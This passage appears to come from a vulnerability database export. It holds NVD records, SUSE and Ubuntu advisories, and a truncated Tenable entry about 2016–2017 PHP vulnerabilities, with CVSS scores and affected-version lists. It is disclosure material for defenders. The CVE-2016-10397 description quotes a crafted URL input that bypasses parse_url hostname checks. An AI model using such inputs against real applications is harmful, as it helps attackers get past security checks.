{"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11142"], "modified": "2018-01-14T02:29:00", "cpe": ["cpe:/a:php:php:7.0.7", "cpe:/a:php:php:7.0.6", "cpe:/a:php:php:5.6.30", "cpe:/a:php:php:7.0.3", "cpe:/a:php:php:7.0.2", "cpe:/a:php:php:7.0.14", "cpe:/a:php:php:7.0.9", "cpe:/a:php:php:7.0.5", "cpe:/a:php:php:7.0.16", "cpe:/a:php:php:7.0.10", "cpe:/a:php:php:7.0.15", "cpe:/a:php:php:7.1.1", "cpe:/a:php:php:7.0.0", "cpe:/a:php:php:7.1.0", "cpe:/a:php:php:7.0.1", "cpe:/a:php:php:7.0.8", "cpe:/a:php:php:7.1.2", "cpe:/a:php:php:7.0.11", "cpe:/a:php:php:7.0.4", "cpe:/a:php:php:7.0.13", "cpe:/a:php:php:7.0.12"], "id": "CVE-2017-11142", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11142", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:php:php:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.30:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "In PHP before 5.6.28 and 7.x before 7.0.13, incorrect handling of various URI components in the URL parser could be used by attackers to bypass hostname-specific URL checks, as demonstrated by evil.example.com:80#@good.example.com/ and evil.example.com:80?@good.example.com/ inputs to the parse_url function (implemented in the php_url_parse_ex function in ext/standard/url.c).", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-10T14:29:00", "title": "CVE-2016-10397", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10397"], "modified": "2018-01-14T02:29:00", "cpe": ["cpe:/a:php:php:7.0.7", "cpe:/a:php:php:7.0.6", "cpe:/a:php:php:7.0.3", "cpe:/a:php:php:7.0.2", "cpe:/a:php:php:7.0.9", "cpe:/a:php:php:7.0.5", "cpe:/a:php:php:7.0.10", "cpe:/a:php:php:7.0.0", "cpe:/a:php:php:5.6.27", "cpe:/a:php:php:7.0.1", "cpe:/a:php:php:7.0.8", "cpe:/a:php:php:7.0.11", "cpe:/a:php:php:7.0.4", "cpe:/a:php:php:7.0.12"], "id": "CVE-2016-10397", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10397", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:php:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.27:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:32", "description": "In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-10T14:29:00", "title": "CVE-2017-11144", "type": "cve", "cwe": ["CWE-754"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11144"], "modified": "2018-05-04T01:29:00", "cpe": ["cpe:/a:php:php:7.0.7", "cpe:/a:php:php:7.0.6", "cpe:/a:php:php:5.6.30", "cpe:/a:php:php:7.1.4", "cpe:/a:php:php:7.0.20", "cpe:/a:php:php:7.0.18", "cpe:/a:php:php:7.0.3", "cpe:/a:php:php:7.0.2", "cpe:/a:php:php:7.0.14", "cpe:/a:php:php:7.0.9", "cpe:/a:php:php:7.1.6", "cpe:/a:php:php:7.0.5", "cpe:/a:php:php:7.0.16", "cpe:/a:php:php:7.1.5", "cpe:/a:php:php:7.1.3", "cpe:/a:php:php:7.0.10", "cpe:/a:php:php:7.0.15", "cpe:/a:php:php:7.1.1", "cpe:/a:php:php:7.0.0", "cpe:/a:php:php:7.1.0", "cpe:/a:php:php:7.0.19", "cpe:/a:php:php:7.0.1", "cpe:/a:php:php:7.0.8", "cpe:/a:php:php:7.1.2", "cpe:/a:php:php:7.0.17", "cpe:/a:php:php:7.0.11", "cpe:/a:php:php:7.0.4", "cpe:/a:php:php:7.0.13", "cpe:/a:php:php:7.0.12"], "id": "CVE-2017-11144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11144", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.30:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:32", "description": "In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR archive handler could be used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function in ext/phar/phar.c.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2017-07-10T14:29:00", "title": "CVE-2017-11147", "type": "cve", "cwe": ["CWE-125"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11147"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:php:php:7.0.7", "cpe:/a:php:php:7.0.6", "cpe:/a:php:php:7.0.3", "cpe:/a:php:php:7.0.2", "cpe:/a:php:php:7.0.14", "cpe:/a:php:php:7.0.9", "cpe:/a:php:php:5.6.29", "cpe:/a:php:php:7.0.5", "cpe:/a:php:php:7.0.10", "cpe:/a:php:php:7.0.0", "cpe:/a:php:php:7.0.1", "cpe:/a:php:php:7.0.8", "cpe:/a:php:php:7.0.11", "cpe:/a:php:php:7.0.4", "cpe:/a:php:php:7.0.13", "cpe:/a:php:php:7.0.12"], "id": "CVE-2017-11147", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11147", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.29:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:32", "description": "In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, an error in the date extension's timelib_meridian parsing code could be used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function. NOTE: the correct fix is in the e8b7698f5ee757ce2c8bd10a192a491a498f891c commit, not the bd77ac90d3bdf31ce2a5251ad92e9e75 gist.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-10T14:29:00", "title": "CVE-2017-11145", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11145"], "modified": "2018-05-04T01:29:00", "cpe": ["cpe:/a:php:php:7.0.7", "cpe:/a:php:php:7.0.6", "cpe:/a:php:php:5.6.30", "cpe:/a:php:php:7.1.4", "cpe:/a:php:php:7.0.20", "cpe:/a:php:php:7.0.18", "cpe:/a:php:php:7.0.3", "cpe:/a:php:php:7.0.2", "cpe:/a:php:php:7.0.14", "cpe:/a:php:php:7.0.9", "cpe:/a:php:php:7.1.6", "cpe:/a:php:php:7.0.5", "cpe:/a:php:php:7.0.16", "cpe:/a:php:php:7.1.5", "cpe:/a:php:php:7.1.3", "cpe:/a:php:php:7.0.10", "cpe:/a:php:php:7.0.15", "cpe:/a:php:php:7.1.1", "cpe:/a:php:php:7.0.0", "cpe:/a:php:php:7.1.0", "cpe:/a:php:php:7.0.19", "cpe:/a:php:php:7.0.1", "cpe:/a:php:php:7.0.8", "cpe:/a:php:php:7.1.2", "cpe:/a:php:php:7.0.17", "cpe:/a:php:php:7.0.11", "cpe:/a:php:php:7.0.4", "cpe:/a:php:php:7.0.13", "cpe:/a:php:php:7.0.12"], "id": "CVE-2017-11145", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11145", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:php:php:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.6.30:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:7.0.8:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:32", "description": "In PHP before 5.6.31, an invalid free in the WDDX deserialization of boolean parameters could be used by attackers able to inject XML for deserialization to crash the PHP interpreter, related to an invalid free for an empty boolean element in ext/wddx/wddx.c.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-07-10T14:29:00", "title": "CVE-2017-11143", "type": "cve", "cwe": ["CWE-416", "CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11143"], "modified": "2018-05-04T01:29:00", "cpe": ["cpe:/a:php:php:5.6.30"], "id": "CVE-2017-11143", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11143", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:php:php:5.6.30:*:*:*:*:*:*:*"]}], "suse": [{"lastseen": "2017-08-30T21:10:27", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10397", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "description": "This update for php7 fixes the following issues:\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host.\n (bsc#1047454)\n - CVE-2017-11142: Remoteattackers could cause a CPU consumption denial of\n service attack by injectinglong form variables, related to\n main/php_variables. (bsc#1048100)\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the\n return value of the OpenSSL sealingfunction, which could lead to a\n crash. (bsc#1048096)\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian coud lead to\n information leak. (bsc#1048112)\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code\n could lead to information leak. (bsc#1048111)\n - CVE-2017-11147: The PHAR archive handler could beused by attackers\n supplying malicious archive files to crash the PHP interpreteror\n potentially disclose information. (bsc#1048094)\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() could\n lead to denial of service (bsc#1050726)\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of service\n (bsc#1050241)\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting in heap\n overflow could lead to denial of service or code execution (bsc#986386)\n\n Other fixes:\n\n - Soap Request with References (bsc#1053645)\n - php7-pear should explicitly require php7-pear-Archive_Tar\n otherwise this dependency must be declared in every php7-pear-* package\n explicitly. [bnc#1052389]\n\n", "edition": 1, "modified": "2017-08-30T19:30:52", "published": "2017-08-30T19:30:52", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-08/msg00075.html", "id": "SUSE-SU-2017:2303-1", "title": "Security update for php7 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-09-04T14:39:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10397", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "description": "This update for php7 fixes the following issues:\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host.\n (bsc#1047454)\n - CVE-2017-11142: Remoteattackers could cause a CPU consumption denial of\n service attack by injectinglong form variables, related to\n main/php_variables. (bsc#1048100)\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the\n return value of the OpenSSL sealingfunction, which could lead to a\n crash. (bsc#1048096)\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian coud lead to\n information leak. (bsc#1048112)\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code\n could lead to information leak. (bsc#1048111)\n - CVE-2017-11147: The PHAR archive handler could beused by attackers\n supplying malicious archive files to crash the PHP interpreteror\n potentially disclose information. (bsc#1048094)\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() could\n lead to denial of service (bsc#1050726)\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of service\n (bsc#1050241)\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting in heap\n overflow could lead to denial of service or code execution (bsc#986386)\n\n Other fixes:\n\n - Soap Request with References (bsc#1053645)\n - php7-pear should explicitly require php7-pear-Archive_Tar\n otherwise this dependency must be declared in every php7-pear-* package\n explicitly. [bnc#1052389]\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "edition": 1, "modified": "2017-09-04T12:07:53", "published": "2017-09-04T12:07:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-09/msg00007.html", "id": "OPENSUSE-SU-2017:2337-1", "title": "Security update for php7 (important)", "type": "suse", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:39:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10397", "CVE-2017-9224", "CVE-2017-9228", "CVE-2017-9226", "CVE-2017-11143", "CVE-2017-9229", "CVE-2017-9227", "CVE-2017-11628", "CVE-2017-11147", "CVE-2017-11145", "CVE-2017-11144"], "description": "USN-3382-1 fixed several vulnerabilities in PHP. This update provides \nthe corresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nIt was discovered that the PHP URL parser incorrectly handled certain URI \ncomponents. A remote attacker could possibly use this issue to bypass \nhostname-specific URL checks. (CVE-2016-10397)\n\nIt was discovered that PHP incorrectly handled certain boolean parameters \nwhen unserializing data. A remote attacker could possibly use this issue to \ncause PHP to crash, resulting in a denial of service. (CVE-2017-11143)\n\nSebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang discovered that PHP \nincorrectly handled the OpenSSL sealing function. A remote attacker could \npossibly use this issue to cause PHP to crash, resulting in a denial of \nservice. (CVE-2017-11144)\n\nWei Lei and Liu Yang discovered that the PHP date extension incorrectly \nhandled memory. A remote attacker could possibly use this issue to disclose \nsensitive information from the server. (CVE-2017-11145)\n\nIt was discovered that PHP incorrectly handled certain PHAR archives. A \nremote attacker could use this issue to cause PHP to crash or disclose \nsensitive information. This issue only affected Ubuntu 14.04 LTS. \n(CVE-2017-11147)\n\nWei Lei and Liu Yang discovered that PHP incorrectly handled parsing ini \nfiles. An attacker could possibly use this issue to cause PHP to crash, \nresulting in a denial of service. (CVE-2017-11628)\n\nIt was discovered that PHP mbstring incorrectly handled certain regular \nexpressions. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2017-9224, CVE-2017-9226, CVE-2017-9227, CVE-2017-9228, CVE-2017-9229)", "edition": 6, "modified": "2017-12-18T00:00:00", "published": "2017-12-18T00:00:00", "id": "USN-3382-2", "href": "https://ubuntu.com/security/notices/USN-3382-2", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-02T11:44:38", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10397", "CVE-2017-9224", "CVE-2017-9228", "CVE-2017-9226", "CVE-2017-11143", "CVE-2017-9229", "CVE-2017-9227", "CVE-2017-11628", "CVE-2015-8994", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11145", "CVE-2017-11144"], "description": "It was discovered that the PHP opcache created keys for files it cached \nbased on their filepath. A local attacker could possibly use this issue in \na shared hosting environment to obtain sensitive information. This issue \nonly affected Ubuntu 14.04 LTS. (CVE-2015-8994)\n\nIt was discovered that the PHP URL parser incorrectly handled certain URI \ncomponents. A remote attacker could possibly use this issue to bypass \nhostname-specific URL checks. This issue only affected Ubuntu 14.04 LTS. \n(CVE-2016-10397)\n\nIt was discovered that PHP incorrectly handled certain boolean parameters \nwhen unserializing data. A remote attacker could possibly use this issue to \ncause PHP to crash, resulting in a denial of service. This issue only \naffected Ubuntu 14.04 LTS. (CVE-2017-11143)\n\nSebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang discovered that PHP \nincorrectly handled the OpenSSL sealing function. A remote attacker could \npossibly use this issue to cause PHP to crash, resulting in a denial of \nservice. (CVE-2017-11144)\n\nWei Lei and Liu Yang discovered that the PHP date extension incorrectly \nhandled memory. A remote attacker could possibly use this issue to disclose \nsensitive information from the server. (CVE-2017-11145)\n\nIt was discovered that PHP incorrectly handled certain PHAR archives. A \nremote attacker could use this issue to cause PHP to crash or disclose \nsensitive information. This issue only affected Ubuntu 14.04 LTS. \n(CVE-2017-11147)\n\nIt was discovered that PHP incorrectly handled locale length. A remote \nattacker could possibly use this issue to cause PHP to crash, resulting in \na denial of service. (CVE-2017-11362)\n\nWei Lei and Liu Yang discovered that PHP incorrectly handled parsing ini \nfiles. An attacker could possibly use this issue to cause PHP to crash, \nresulting in a denial of service. (CVE-2017-11628)\n\nIt was discovered that PHP mbstring incorrectly handled certain regular \nexpressions. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2017-9224, CVE-2017-9226, CVE-2017-9227, CVE-2017-9228, CVE-2017-9229)", "edition": 5, "modified": "2017-08-10T00:00:00", "published": "2017-08-10T00:00:00", "id": "USN-3382-1", "href": "https://ubuntu.com/security/notices/USN-3382-1", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "tenable": [{"lastseen": "2018-02-21T14:27:06", "bulletinFamily": "info", "cvelist": ["CVE-2017-11142"], "description": "Tenable has released updates for SecurityCenter 5.3.2, 5.4.0, 5.4.2, 5.4.5, 5.5.0, and 5.5.1 to bring the version of PHP included with them to 5.6.31. \n \nPHP 5.6.31 